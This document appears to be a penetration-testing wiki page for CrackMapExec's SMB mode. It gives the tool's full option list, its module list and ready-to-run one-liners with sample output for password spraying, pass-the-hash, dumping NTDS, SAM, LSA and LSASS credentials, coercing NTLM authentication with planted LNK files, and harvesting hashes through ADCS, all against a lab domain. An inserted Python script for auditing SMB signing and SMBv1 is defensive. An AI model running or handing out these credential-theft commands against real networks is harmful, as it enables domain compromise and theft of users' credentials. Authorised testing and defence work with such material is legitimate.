SMB
Installation
Install CrackMapExec
Usage
cme smb [-h] [-id CRED_ID [CRED_ID ...]] [-u USERNAME [USERNAME ...]] [-p PASSWORD [PASSWORD ...]] [-k] [--no-bruteforce] [--continue-on-success] [--use-kcache] [--log LOG] [--aesKey AESKEY [AESKEY ...]]
[--kdcHost KDCHOST] [--gfail-limit LIMIT | --ufail-limit LIMIT | --fail-limit LIMIT] [-M MODULE] [-o MODULE_OPTION [MODULE_OPTION ...]] [-L] [--options] [--server {https,http}] [--server-host HOST]
[--server-port PORT] [--connectback-host CHOST] [-H HASH [HASH ...]] [-d DOMAIN | --local-auth] [--port {139,445}] [--share SHARE] [--smb-server-port SMB_SERVER_PORT] [--gen-relay-list OUTPUT_FILE]
[--smb-timeout SMB_TIMEOUT] [--laps [LAPS]] [--sam] [--lsa] [--ntds [{drsuapi,vss}]] [--dpapi [{password,cookies}]] [--mkfile MKFILE] [--pvk PVK] [--enabled] [--user USERNTDS] [--shares]
[--filter-shares FILTER_SHARES [FILTER_SHARES ...]] [--sessions] [--disks] [--loggedon-users-filter LOGGEDON_USERS_FILTER] [--loggedon-users] [--users [USER]] [--groups [GROUP]] [--computers [COMPUTER]]
[--local-groups [GROUP]] [--pass-pol] [--rid-brute [MAX_RID]] [--wmi QUERY] [--wmi-namespace NAMESPACE] [--spider SHARE] [--spider-folder FOLDER] [--content] [--exclude-dirs DIR_LIST]
[--pattern PATTERN [PATTERN ...] | --regex REGEX [REGEX ...]] [--depth DEPTH] [--only-files] [--put-file FILE FILE] [--get-file FILE FILE] [--append-host] [--exec-method {atexec,mmcexec,wmiexec,smbexec}]
[--codec CODEC] [--force-ps32] [--no-output] [-x COMMAND | -X PS_COMMAND] [--obfs] [--amsi-bypass FILE] [--clear-obfscripts]
target [target ...]
Flags
positional arguments:
target the target IP(s), range(s), CIDR(s), hostname(s), FQDN(s), file(s) containing a list of targets, NMap XML or .Nessus file(s)
options:
-h, --help show this help message and exit
-id CRED_ID [CRED_ID ...]
database credential ID(s) to use for authentication
-u USERNAME [USERNAME ...]
username(s) or file(s) containing usernames
-p PASSWORD [PASSWORD ...]
password(s) or file(s) containing passwords
-k, --kerberos Use Kerberos authentication
--no-bruteforce No spray when using file for username and password (user1 => password1, user2 => password2)
--continue-on-success
continues authentication attempts even after successes
--use-kcache Use Kerberos authentication from ccache file (KRB5CCNAME)
--log LOG Export result into a custom file
--aesKey AESKEY [AESKEY ...]
AES key to use for Kerberos Authentication (128 or 256 bits)
--kdcHost KDCHOST FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
--gfail-limit LIMIT max number of global failed login attempts
--ufail-limit LIMIT max number of failed login attempts per username
--fail-limit LIMIT max number of failed login attempts per host
-M MODULE, --module MODULE
module to use
-o MODULE_OPTION [MODULE_OPTION ...]
module options
-L, --list-modules list available modules
--options display module options
--server {https,http}
use the selected server (default: https)
--server-host HOST IP to bind the server to (default: 0.0.0.0)
--server-port PORT start the server on the specified port
--connectback-host CHOST
IP for the remote system to connect back to (default: same as server-host)
-H HASH [HASH ...], --hash HASH [HASH ...]
NTLM hash(es) or file(s) containing NTLM hashes
-d DOMAIN domain to authenticate to
--local-auth authenticate locally to each target
--port {139,445} SMB port (default: 445)
--share SHARE specify a share (default: C$)
--smb-server-port SMB_SERVER_PORT
specify a server port for SMB
--gen-relay-list OUTPUT_FILE
outputs all hosts that don't require SMB signing to the specified file
--smb-timeout SMB_TIMEOUT
SMB connection timeout, default 2 seconds
--laps [LAPS] LAPS authentication
Credential Gathering:
Options for gathering credentials
--sam dump SAM hashes from target systems
--lsa dump LSA secrets from target systems
--ntds [{drsuapi,vss}]
dump the NTDS.dit from target DCs using the specified method (default: drsuapi)
--dpapi [{password,cookies}]
dump DPAPI secrets from target systems, can dump cookies if you add "cookies" (default: password)
--mkfile MKFILE DPAPI option. File with masterkeys in form of {GUID}:SHA1
--pvk PVK DPAPI option. File with domain backupkey
--enabled Only dump enabled targets from DC
--user USERNTDS Dump selected user from DC
Mapping/Enumeration:
Options for Mapping/Enumerating
--shares enumerate shares and access
--filter-shares FILTER_SHARES [FILTER_SHARES ...]
Filter share by access, option 'read' 'write' or 'read,write'
--sessions enumerate active sessions
--disks enumerate disks
--loggedon-users-filter LOGGEDON_USERS_FILTER
only search for specific user, works with regex
--loggedon-users enumerate logged on users
--users [USER] enumerate domain users, if a user is specified then only its information is queried
--groups [GROUP] enumerate domain groups, if a group is specified then its members are enumerated
--computers [COMPUTER]
enumerate computer users
--local-groups [GROUP]
enumerate local groups, if a group is specified then its members are enumerated
--pass-pol dump password policy
--rid-brute [MAX_RID]
enumerate users by bruteforcing RID's (default: 4000)
--wmi QUERY issues the specified WMI query
--wmi-namespace NAMESPACE
WMI Namespace (default: root\cimv2)
Spidering:
Options for spidering shares
--spider SHARE share to spider
--spider-folder FOLDER
folder to spider (default: root share directory)
--content enable file content searching
--exclude-dirs DIR_LIST
directories to exclude from spidering
--pattern PATTERN [PATTERN ...]
pattern(s) to search for in folders, filenames and file content
--regex REGEX [REGEX ...]
regex(s) to search for in folders, filenames and file content
--depth DEPTH max spider recursion depth (default: infinity & beyond)
--only-files only spider files
Files:
Options for put and get remote files
--put-file FILE FILE Put a local file into remote target, ex: whoami.txt \\Windows\\Temp\\whoami.txt
--get-file FILE FILE Get a remote file, ex: \\Windows\\Temp\\whoami.txt whoami.txt
--append-host append the host to the get-file filename
Command Execution:
Options for executing commands
--exec-method {atexec,mmcexec,wmiexec,smbexec}
method to execute the command. Ignored if in MSSQL mode (default: wmiexec)
--codec CODEC Set encoding used (codec) from the target's output (default "utf-8"). If errors are detected, run chcp.com at the target, map the result with
https://docs.python.org/3/library/codecs.html#standard-encodings and then execute again with --codec and the corresponding codec
--force-ps32 force the PowerShell command to run in a 32-bit process
--no-output do not retrieve command output
-x COMMAND execute the specified command
-X PS_COMMAND execute the specified PowerShell command
Powershell Obfuscation:
Options for PowerShell script obfuscation
--obfs Obfuscate PowerShell scripts
--amsi-bypass FILE File with a custom AMSI bypass
--clear-obfscripts Clear all cached obfuscated PowerShell scripts
Modules
The modules below can be used with the -M option.
[*] add-computer Adds or deletes a domain computer
[*] bh_owned Set pwned computer as owned in Bloodhound
[*] dfscoerce Module to check if the DC is vulnerable to DFSCoerce, credit to @filip_dragovic/@Wh04m1001 and @topotam
[*] drop-sc Drop a searchConnector-ms file on each writable share
[*] empire_exec Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
[*] enum_av Gathers information on all endpoint protection solutions installed on the remote host(s) via LsarLookupNames (no privilege needed)
[*] enum_dns Uses WMI to dump DNS from an AD DNS Server
[*] firefox Dump credentials from Firefox
[*] get_netconnections Uses WMI to query network connections.
[*] gpp_autologin Searches the domain controller for registry.xml to find autologon information and returns the username and password.
[*] gpp_password Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
[*] handlekatz Get lsass dump using handlekatz64 and parse the result with pypykatz
[*] hash_spider Dump lsass recursively from a given hash using BH to find local admins
[*] iis Checks for credentials in IIS Application Pool configuration files using appcmd.exe
[*] impersonate List and impersonate tokens to run command as locally logged on users
[*] install_elevated Checks for AlwaysInstallElevated
[*] ioxidresolver This module helps you to identify hosts that have additional active interfaces
[*] keepass_discover Search for KeePass-related files and process.
[*] keepass_trigger Set up a malicious KeePass trigger to export the database in cleartext.
[*] lsassy Dump lsass and parse the result remotely with lsassy
[*] masky Remotely dump domain user credentials via an ADCS and a KDC
[*] met_inject Downloads the Meterpreter stager and injects it into memory
[*] ms17-010 MS17-010, /!\ not tested outside home lab
[*] msol Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server
[*] nanodump Get lsass dump using nanodump and parse the result with pypykatz
[*] nopac Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
[*] ntdsutil Dump NTDS with ntdsutil
[*] ntlmv1 Detect if lmcompatibilitylevel on the target is set to 0 or 1
[*] petitpotam Module to check if the DC is vulnerable to PetitPotam, credit to @topotam
[*] pi Run command as logged on users via Process Injection
[*] printnightmare Check if host vulnerable to printnightmare
[*] procdump Get lsass dump using procdump64 and parse the result with pypykatz
[*] rdcman Remotely dump Remote Desktop Connection Manager (sysinternals) credentials
[*] rdp Enables/Disables RDP
[*] reg-query Performs a registry query on the machine
[*] runasppl Check if the registry value RunAsPPL is set or not
[*] scuffy Creates and dumps an arbitrary .scf file with the icon property containing a UNC path to the declared SMB server against all writeable shares
[*] shadowcoerce Module to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam
[*] slinky Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions
[*] spider_plus List files recursively (excluding `EXCLUDE_FILTER` and `EXCLUDE_EXTS` extensions) and save JSON share-file metadata to the `OUTPUT_FOLDER`. If `DOWNLOAD_FLAG`=True, download files smaller than `MAX_FILE_SIZE` to the `OUTPUT_FOLDER`.
[*] spooler Detect if print spooler is enabled or not
[*] teams_localdb Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process
[*] test_connection Pings a host
[*] uac Checks UAC status
[*] veeam Extracts credentials from local Veeam SQL Database
[*] wcc Check various security configuration items on Windows machines
[*] wdigest Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1
[*] web_delivery Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module
[*] webdav Checks whether the WebClient service is running on the target
[*] wifi Get key of all wireless interfaces
[*] winscp Looks for WinSCP.ini files in the registry and default locations and tries to extract credentials.
[*] zerologon Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472
Handy one-liners
For local authentication, add the --local-auth flag to the command.
Dump NTDS
cme smb <target> -u <user> -p <password> --ntds
Dump NTDS history
cme smb <target> -u <user> -p <password> --ntds-history
Dump SAM
cme smb <target> -u <user> -p <password> --sam
Dump LSA
cme smb <target> -u <user> -p <password> --lsa
Domain password spray
To find valid usernames to spray, have a look at Kerbrute.
By default CME will stop when a valid login combination is found. If you want CME to proceed with the whole list you're trying, use the --continue-on-success flag.
cme smb <dc-ip> -u <user.txt> -p <password.txt>
Dump LSASS
cme smb <target> -u <user> -p <password> -M lsassy
If the lsassy module fails, use the following instead, which dumps with Sysinternals procdump:
cme smb <target> -u <user> -p <password> -M lsassy -o DUMP_METHOD=2 PROCDUMP_PATH=/sysinternals/procdump.exe
Other modules that can be used:
- handlekatz
- nanodump
Dump KeePass
cme smb <target> -u <user-or-admin> -p <password> -M keepass_discover
cme smb <target> -u <user-or-admin> -p <password> -M keepass_trigger -o KEEPASS_CONFIG_PATH="C:\Users\crypt0rr\AppData\Roaming\KeePass\KeePass.config.xml" ACTION=ALL
Check Password Policy
cme smb <dc-ip> -u <user> -p <password> --pass-pol
Enable/disable RDP
ACTION can be set to enable or disable.
cme smb <target> -u <user> -p <password> -M rdp -o ACTION='enable'
Enumerate shares
cme smb <target> -u <user> -p <password> --shares
Practical examples
Check targetlist
Can be used with a file as input or with a single IP. The banner line printed per host also shows the SMB version (SMBv1 on or off) and whether SMB signing is required.
$ cme smb targets.txt
SMB 10.10.10.16 445 DC2008R2 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (name:DC2008R2) (domain:offsec.nl) (signing:True) (SMBv1:True)
SMB 10.10.10.10 445 DC2016 [*] Windows Server 2016 Standard 14393 (name:DC2016) (domain:offsec.nl) (signing:True) (SMBv1:True)
SMB 10.10.10.11 445 DC2019 [*] Windows 10.0 Build 17763 (name:DC2019) (domain:offsec.nl) (signing:True) (SMBv1:False)
Generate target list where targets do not require signing
$ cme smb 10.10.10.0/24 --gen-relay-list list
SMB 10.10.10.1 445 SRV2K8R2 [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:SRV2K8R2) (domain:offsec.nl) (signing:True) (SMBv1:True)
SMB 10.10.10.2 445 SRV2016 [*] Windows Server 2016 Standard 14393 x64 (name:SRV2016) (domain:offsec.nl) (signing:True) (SMBv1:True)
SMB 10.10.10.3 445 WIN10 [*] Windows 10.0 Build 19041 x64 (name:WIN10) (domain:offsec.nl) (signing:False) (SMBv1:False)
$ cat list
10.10.10.3
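The banner lines above carry the signing and SMBv1 state for every reachable host. As an added example (not part of this page or of the CrackMapExec project), the parser below reads saved CME SMB output and produces a remediation list of hosts that do not require signing or still have SMBv1 enabled; the sample log is constructed from the page's own banner format, and the regular expression is an assumption about that format.

```python
import re
from dataclasses import dataclass

# Banner line CME prints once per reachable SMB host (format assumed from the page):
# SMB 10.10.10.3 445 WIN10 [*] Windows 10.0 Build 19041 x64 (name:WIN10) (domain:offsec.nl) (signing:False) (SMBv1:False)
BANNER_RE = re.compile(
    r"^SMB\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[\*\]\s+"
    r"(?P<os>.+?)\s+\(name:\s*(?P<name>[^)]*)\)\s+\(domain:\s*(?P<domain>[^)]*)\)\s+"
    r"\(signing:\s*(?P<signing>True|False)\)\s+\(SMBv1:\s*(?P<smbv1>True|False)\)\s*$"
)


@dataclass(frozen=True)
class SmbHost:
    ip: str
    hostname: str
    domain: str
    os: str
    signing: bool   # True when the server requires SMB signing
    smbv1: bool     # True when SMBv1 is still negotiable


def parse_banner(line):
    """Return an SmbHost for a banner line, or None for any other CME line ([+], [-], module output)."""
    m = BANNER_RE.match(line.strip())
    if not m:
        return None
    return SmbHost(ip=m["ip"], hostname=m["name"], domain=m["domain"], os=m["os"],
                   signing=m["signing"] == "True", smbv1=m["smbv1"] == "True")


def parse_log(text):
    """Parse a whole CME run; CME repeats the banner per credential attempt, so de-duplicate on IP."""
    hosts = {}
    for line in text.splitlines():
        host = parse_banner(line)
        if host is not None:
            hosts[host.ip] = host
    return sorted(hosts.values(), key=lambda h: tuple(int(o) for o in h.ip.split(".")))


def audit(hosts):
    """Findings to hand to the owners: (ip, hostname, issue) for each weak SMB setting."""
    findings = []
    for h in hosts:
        if not h.signing:
            findings.append((h.ip, h.hostname, "SMB signing not required"))
        if h.smbv1:
            findings.append((h.ip, h.hostname, "SMBv1 enabled"))
    return findings


def unsigned_hosts(hosts):
    """IPs whose server does not require signing: the same set --gen-relay-list would write."""
    return [h.ip for h in hosts if not h.signing]


# Constructed sample: three banners, one repeated banner, and one auth result line.
SAMPLE_LOG = r"""
SMB 10.10.10.1 445 SRV2K8R2 [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:SRV2K8R2) (domain:offsec.nl) (signing:True) (SMBv1:True)
SMB 10.10.10.2 445 SRV2016 [*] Windows Server 2016 Standard 14393 x64 (name:SRV2016) (domain:offsec.nl) (signing:True) (SMBv1:True)
SMB 10.10.10.3 445 WIN10 [*] Windows 10.0 Build 19041 x64 (name:WIN10) (domain:offsec.nl) (signing:False) (SMBv1:False)
SMB 10.10.10.3 445 WIN10 [*] Windows 10.0 Build 19041 x64 (name:WIN10) (domain:offsec.nl) (signing:False) (SMBv1:False)
SMB 10.10.10.3 445 WIN10 [+] offsec.nl\johndo:Welkom1234
"""

if __name__ == "__main__":
    for ip, name, issue in audit(parse_log(SAMPLE_LOG)):
        print(f"{ip:<15} {name:<12} {issue}")
```

Feed it the saved output of a plain `cme smb targets.txt` run; hosts that fail to answer print no banner and so need a separate reachability check.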
Check targets for ability to log in, and check local admin
When '(Pwn3d!)' is shown, the user is local admin on the target server.
$ cme smb targets -u johndo -p Welkom1234 -d offsec
SMB 10.10.10.10 445 DC2016 [*] Windows Server 2016 Standard 14393 (name:DC2016) (domain:offsec) (signing:True) (SMBv1:True)
SMB 10.10.10.16 445 DC2008R2 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (name:DC2008R2) (domain:offsec) (signing:True) (SMBv1:True)
SMB 10.10.10.11 445 DC2019 [*] Windows 10.0 Build 17763 (name:DC2019) (domain:offsec) (signing:True) (SMBv1:False)
SMB 10.10.10.10 445 DC2016 [+] offsec\johndo:Welkom1234 (Pwn3d!)
SMB 10.10.10.16 445 DC2008R2 [+] offsec\johndo:Welkom1234
SMB 10.10.10.11 445 DC2019 [+] offsec\johndo:Welkom1234
Dump NTDS (remote)
$ cme smb 10.10.10.10 -u johndo -H caec1e1d755119a15bfb6cd3d5994305 --ntds
SMB 10.10.10.10 445 DC2016 [*] Windows Server 2016 Standard 14393 x64 (name:DC2016) (domain:offsec.nl) (signing:True) (SMBv1:True)
SMB 10.10.10.10 445 DC2016 [+] offsec.nl\johndo:Welkom1234 (Pwn3d!)
SMB 10.10.10.10 445 DC2016 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.10.10 445 DC2016 Administrator:500:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
SMB 10.10.10.10 445 DC2016 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.10 445 DC2016 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:102277341d6c113a28017200e1dfafe9:::
SMB 10.10.10.10 445 DC2016 offsec.nl\johndo:1107:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
SMB 10.10.10.10 445 DC2016 offsec.nl\adm_johndo:1108:aad3b435b51404eeaad3b435b51404ee:caec1e1d755119a15bfb6cd3d5994305:::
The file below is an example of the full output of the command above.
Dump LSASS (remote)
$ cme smb 10.10.10.16 -u johndo -p Welkom1234 -d offsec -M lsassy
SMB 10.10.10.16 445 DC2008R2 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (name:DC2008R2) (domain:offsec) (signing:True) (SMBv1:True)
SMB 10.10.10.16 445 DC2008R2 [+] offsec\johndo:Welkom1234 (Pwn3d!)
LSASSY 10.10.10.16 445 DC2008R2 offsec\adm_johndo ThisPasswordIsToHardToCrack!
LSASSY 10.10.10.16 445 DC2008R2 offsec.NL\adm_johndo ThisPasswordIsToHardToCrack!
Using procdump (sysinternals).
$ cme smb 10.10.10.10 -u johndo-adm -p Welkom1234 -M procdump
SMB 10.10.10.10 445 IITJUMPHOST [*] Windows 10.0 Build 20348 x64 (name:IITJUMPHOST) (domain:OFFSEC.nl) (signing:False) (SMBv1:False)
SMB 10.10.10.10 445 IITJUMPHOST [+] OFFSEC.nl\johndo-adm:Welkom1234 (Pwn3d!)
PROCDUMP 10.10.10.10 445 IITJUMPHOST [*] Copy /tmp/procdump.exe to C:\Windows\Temp\
PROCDUMP 10.10.10.10 445 IITJUMPHOST [+] Created file procdump.exe on the \\C$\Windows\Temp\
PROCDUMP 10.10.10.10 445 IITJUMPHOST [*] Getting lsass PID tasklist /v /fo csv | findstr /i "lsass"
PROCDUMP 10.10.10.10 445 IITJUMPHOST [*] Executing command C:\Windows\Temp\procdump.exe -accepteula -ma 760 C:\Windows\Temp\%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.dmp
PROCDUMP 10.10.10.10 445 IITJUMPHOST [+] Process lsass.exe was successfully dumped
PROCDUMP 10.10.10.10 445 IITJUMPHOST [*] Copy IITJUMPHOST-AMD64-OFFSEC.dmp to host
PROCDUMP 10.10.10.10 445 IITJUMPHOST [+] Dumpfile of lsass.exe was transferred to /tmp/IITJUMPHOST-AMD64-OFFSEC.dmp
PROCDUMP 10.10.10.10 445 IITJUMPHOST [+] Deleted procdump file on the C$ share
PROCDUMP 10.10.10.10 445 IITJUMPHOST [+] Deleted lsass.dmp file on the C$ share
PROCDUMP 10.10.10.10 445 IITJUMPHOST offsec.NL\adm_johndo ThisPasswordIsToHardToCrack!
Other modules that can be used:
- handlekatz
- nanodump
Dump SAM (local-authentication)
$ cme smb scope.txt -u administrator -p Welkom1234 --sam --local-auth
SMB 10.10.10.10 445 DC2016 [*] Windows 10.0 Build 14393 x64 (name:DC2016) (domain:offsec.nl) (signing:True) (SMBv1:False)
SMB 10.10.10.10 445 DC2016 [+] offsec.nl\administrator:Welkom1234 (Pwn3d!)
SMB 10.10.10.10 445 DC2016 [+] Dumping SAM hashes
SMB 10.10.10.10 445 DC2016 Administrator:500:aad3b435b51404eeaad3b435b51404ee:5f859684db2422704e9e4c2cd7e27b07:::
SMB 10.10.10.10 445 DC2016 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.10 445 DC2016 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.10 445 DC2016 [+] Added 3 SAM hashes to the database
Dump LSA (local-authentication)
$ cme smb scope.txt -u administrator -p 'Welkom1234' --local-auth --lsa
SMB 10.10.10.116 445 VMV07 [*] Windows Server 2016 Standard 14393 x64 (name:VMV07) (domain:VMV07) (signing:False) (SMBv1:True)
SMB 10.10.10.115 445 VMV06 [*] Windows Server 2016 Standard 14393 x64 (name:VMV06) (domain:VMV06) (signing:False) (SMBv1:True)
SMB 10.10.10.112 445 VMV03 [*] Windows Server 2016 Standard 14393 x64 (name:VMV03) (domain:VMV03) (signing:False) (SMBv1:True)
SMB 10.10.10.116 445 VMV07 [+] VMV07\administrator:Welkom1234 (Pwn3d!)
SMB 10.10.10.115 445 VMV06 [+] VMV06\administrator:Welkom1234 (Pwn3d!)
SMB 10.10.10.116 445 VMV07 offsec.nl/john.do:$DCC2$10240#john.do#fd8d7a9b530fe6978821647e3275a01f
SMB 10.10.10.110 445 VMV01 offsec.nl/john.do:$DCC2$10240#john.do#6d33d010685524188445af2dddda2c66
SMB 10.10.10.110 445 VMV01 offsec.nl/jane.do:$DCC2$10240#jane.do#e12335228dd44cb595e37afb3cb14a0c
Pass the Hash
$ cme smb 10.10.10.10-16 -u administrator -H 97f2592347d8fbe42be381726ff9ea83 -M lsassy
SMB 10.10.10.16 445 DC2008R2 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:DC2008R2) (domain:offsec.nl) (signing:True) (SMBv1:True)
SMB 10.10.10.10 445 DC2016 [*] Windows Server 2016 Standard 14393 x64 (name:DC2016) (domain:offsec.nl) (signing:True) (SMBv1:True)
SMB 10.10.10.11 445 DC2019 [*] Windows 10.0 Build 17763 x64 (name:DC2019) (domain:offsec.nl) (signing:True) (SMBv1:False)
SMB 10.10.10.16 445 DC2008R2 [+] offsec.nl\administrator 97f2592347d8fbe42be381726ff9ea83 (Pwn3d!)
SMB 10.10.10.10 445 DC2016 [+] offsec.nl\administrator 97f2592347d8fbe42be381726ff9ea83 (Pwn3d!)
SMB 10.10.10.11 445 DC2019 [+] offsec.nl\administrator 97f2592347d8fbe42be381726ff9ea83 (Pwn3d!)
LSASSY 10.10.10.10 445 DC2016 [*] No credentials found
LSASSY 10.10.10.16 445 DC2008R2 [*] No credentials found
LSASSY 10.10.10.11 445 DC2019 offsec\Administrator 97f2592347d8fbe42be381726ff9ea83
LSASSY 10.10.10.11 445 DC2019 offsec.nl\Administrator Welkom1234
Remote User Account Control (UAC)
If you know the user has local administrator rights but you get the error STATUS_LOGON_TYPE_NOT_GRANTED, or the authentication works but without Pwn3d!, Remote User Account Control is likely to be enabled.
Have a look at Regedit - Disabled Remote UAC
$ cme smb 10.10.10.10 -u johndo -p 'Welkom1234!' --local-auth
SMB 10.10.10.10 445 WIN10 [*] Windows 10.0 Build 17763 x64 (name:WIN10) (domain:WIN10) (signing:True) (SMBv1:False)
SMB 10.10.10.10 445 WIN10 [-] WIN10\Administrator:Welkom1234! STATUS_LOGON_TYPE_NOT_GRANTED
Trigger NTLM / SMB authentication through shortcut (SLINKY)
Find a writable share.
$ cme smb 10.10.10.15 -u johndo -p 'Welkom1234!' --shares
SMB 10.10.10.15 445 SRV_FS [*] Windows 10.0 Build 19041 x64 (name:SRV_FS) (domain:OFFSEC.NL) (signing:False) (SMBv1:False)
SMB 10.10.10.15 445 SRV_FS [+] OFFSEC.NL\johndo:Welkom1234!
SMB 10.10.10.15 445 SRV_FS [+] Enumerated shares
SMB 10.10.10.15 445 SRV_FS Share Permissions Remark
SMB 10.10.10.15 445 SRV_FS ----- ----------- ------
SMB 10.10.10.15 445 SRV_FS ADMIN$ - Remote Admin
SMB 10.10.10.15 445 SRV_FS C$ - Default share
SMB 10.10.10.15 445 SRV_FS example READ,WRITE
SMB 10.10.10.15 445 SRV_FS IPC$ - Remote IPC
Place file on writable share on target system.
$ cme smb 10.10.10.15 -u johndo -p 'Welkom1234!' -M slinky -o NAME=examplefile SERVER=10.10.10.20
[!] Module is not opsec safe, are you sure you want to run this? [Y/n] y
SMB 10.10.10.15 445 SRV_FS [*] Windows 10.0 Build 19041 x64 (name:SRV_FS) (domain:OFFSEC.NL) (signing:False) (SMBv1:False)
SMB 10.10.10.15 445 SRV_FS [+] OFFSEC.NL\johndo:Welkom1234!
SLINKY 10.10.10.15 445 SRV_FS [+] Found writable share: example
SLINKY 10.10.10.15 445 SRV_FS [+] Created LNK file on the example share
Clean-up the placed file.
$ cme smb 10.10.10.15 -u johndo -p 'Welkom1234!' -M slinky -o NAME=EXAMPLE SERVER=10.10.10.20 CLEANUP=True
[!] Module is not opsec safe, are you sure you want to run this? [Y/n] y
SMB 10.10.10.15 445 SRV_FS [*] Windows 10.0 Build 19041 x64 (name:SRV_FS) (domain:OFFSEC.NL) (signing:False) (SMBv1:False)
SMB 10.10.10.15 445 SRV_FS [+] OFFSEC.NL\johndo:Welkom1234!
SLINKY 10.10.10.15 445 SRV_FS [+] Found writable share: example
SLINKY 10.10.10.15 445 SRV_FS [+] Deleted LNK file on the example share
Exploit ADCS to retrieve NTLM hashes for all connected users (masky)
$ cme smb 10.10.10.8 -u john-adm -p Welkom1234! -M masky -o CA='ADCS01.offsec.nl\offsec-ADCS01-CA'
SMB 10.10.10.8 445 ADCS01 [*] Windows 10.0 Build 20348 x64 (name:ADCS01) (domain:offsec.nl) (signing:False) (SMBv1:False)
SMB 10.10.10.8 445 ADCS01 [+] offsec.nl\john-adm:Welkom1234! (Pwn3d!)
MASKY 10.10.10.8 445 ADCS01 [*] Running Masky on the targeted host
MASKY 10.10.10.8 445 ADCS01 [*] 2 session(s) successfully hijacked
MASKY 10.10.10.8 445 ADCS01 [*] Attempting to retrieve NT hash(es) via PKINIT
MASKY 10.10.10.8 445 ADCS01 offsec\john-adm 97f2592347d8fbe42be381726ff9ea83
MASKY 10.10.10.8 445 ADCS01 offsec\administrator 97f2592347d8fbe42be381726ff9ea83
MASKY 10.10.10.8 445 ADCS01 [+] 2 NT hash(es) successfully collected